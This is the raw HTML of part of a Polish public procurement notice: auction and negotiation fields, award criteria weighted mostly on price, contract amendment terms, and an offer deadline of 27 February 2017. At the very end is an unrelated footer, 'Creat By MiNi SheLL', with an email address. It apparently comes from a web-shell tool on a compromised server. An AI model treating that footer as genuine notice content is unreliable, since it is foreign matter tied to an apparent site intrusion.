                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>gwarancja</td><td>15</td></tr><tr><td>termin wykonania dokumentacji projektowej </td><td>10</td></tr><tr><td>termin zakończenia przedmiotu zamówienia </td><td>15</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane jedynie w formie pisemnej w postaci aneksu do umowy podpisanego przez obydwie strony, pod rygorem nieważności2. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, w zakresie:2.1. Zmiany terminu realizacji przedmiotu umowy: a) spowodowane niemożliwymi do wcześniejszego przewidzenia, pomimo zachowania należytej staranności, warunkami atmosferycznymi, geologicznymi, archeologicznymi, w szczególności:-klęskami żywiołowymi,-warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w szczególności ekstremalne temperatury powietrza, wichury uniemożliwiające pracę maszyn budowlanych, gwałtowne opady deszczu powodujące podtopienia.-niewypałami i niewybuchami Uzasadnienie wystąpienia w trakcie wykonywania robót budowlanych powyższych okoliczności i zasadności na tej podstawie przedłużenia terminu realizacji przedmiotu zamówienia, po otrzymaniu pisemnego wniosku Wykonawcy, każdorazowo decyduje Zamawiającyb) będącenastępstwem działania organów administracji, w szczególności:- opóźnienia w dokonaniu określonych czynności przez właściwe organy, które są następstwem okoliczności, za które Wykonawca nie ponosi odpowiedzialności w szczególności opóźnienia w wydawaniu decyzji, uzgodnień czy zezwoleń wymaganych przez przepisy prawa, odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń;c) spowodowanezmianą przepisów powodujących konieczność uzyskania dokumentów, które te przepisy narzucają, z zastrzeżeniem, że treść zmiany przepisów nie była uchwalona przed wszczęciem postępowania.2.2Zmian osobowych:a)zmiany osób reprezentujących Zamawiającego lub Wykonawcę;b)zmianaalbo rezygnacja z Podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy. Jeżeli zmiana albo rezygnacja z Podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powołał się na zasadach określonych w art. 22a Pzp w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny Podwykonawca lub Wykonawca samodzielnie wypełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia;2.3.Pozostałych zmian:a)zmiana ustawowej stawki VAT na realizowany przedmiot umowy.b)zmiana umowy w zakresie wynikającym z umowy o dofinansowanie zadania zawartej pomiędzy Zamawiającym a jednostką udzielającą dofinansowania.3. Nie będą  stanowić  zmiany umowy,  zmiany dotyczące danych teleadresowych, związanych z obsługą administracyjno- organizacyjną w tym zmiana nr rachunku bankowego oraz danych rejestrowych<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 27/02/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com